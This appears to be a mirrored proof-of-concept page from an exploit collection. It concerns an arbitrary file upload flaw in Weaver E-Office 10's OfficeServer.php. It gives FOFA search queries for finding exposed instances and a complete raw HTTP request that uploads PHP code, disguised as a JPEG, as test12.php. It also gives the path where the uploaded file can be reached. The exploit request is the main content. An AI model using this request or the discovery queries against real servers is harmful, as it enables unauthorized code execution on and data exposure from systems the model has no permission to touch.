mirror of
https://github.com/eeeeeeeeee-code/POC.git
synced 2025-11-05 10:25:55 +00:00
48 lines
1.2 KiB
Markdown
48 lines
1.2 KiB
Markdown
|
## 泛微E-Office10-OfficeServer任意文件上传漏洞
|
||
|
|
|
||
|
|
泛微OA E-0ffice 10 OfficeServer.php 存在任意文件上传漏洞,攻击者通过漏洞可以获取到服务器敏感信息。
|
||
|
|
|
||
|
|
## fofa
|
||
|
|
|
||
|
|
```
|
||
|
|
app="泛微-EOffice"
|
||
|
|
|
||
|
|
body="eoffice_loading_tip" && body="eoffice10"
|
||
|
|
```
|
||
|
|
|
||
|
|
|
||
|
|
|
||
|
|
## poc
|
||
|
|
|
||
|
|
```
|
||
|
|
POST /eoffice10/server/public/iWebOffice2015/OfficeServer.php HTTP/1.1
|
||
|
|
Host: xxx.xxx.xxx.xxx
|
||
|
|
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0
|
||
|
|
Content-Length: 395
|
||
|
|
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryJjb5ZAJOOXO7fwjs
|
||
|
|
Accept-Encoding: gzip, deflate
|
||
|
|
Connection: close
|
||
|
|
|
||
|
|
------WebKitFormBoundaryJjb5ZAJOOXO7fwjs
|
||
|
|
Content-Disposition: form-data; name="FileData"; filename="1.jpg"
|
||
|
|
Content-Type: image/jpeg
|
||
|
|
|
||
|
|
<?php phpinfo();unlink(__FILE__);?>
|
||
|
|
------WebKitFormBoundaryJjb5ZAJOOXO7fwjs
|
||
|
|
Content-Disposition: form-data; name="FormData"
|
||
|
|
|
||
|
|
{'USERNAME':'','RECORDID':'undefined','OPTION':'SAVEFILE','FILENAME':'test12.php'}
|
||
|
|
------WebKitFormBoundaryJjb5ZAJOOXO7fwjs--
|
||
|
|
```
|
||
|
|
|
||
|
|
|
||
|
|
|
||
|
|
|
||
|
|
|
||
|
|
文件路径
|
||
|
|
|
||
|
|
```
|
||
|
|
http://xxx.xxx.xxx.xxx/eoffice10/server/public/iWebOffice2015/Document/test12.php
|
||
|
|
```
|
||
|
|
|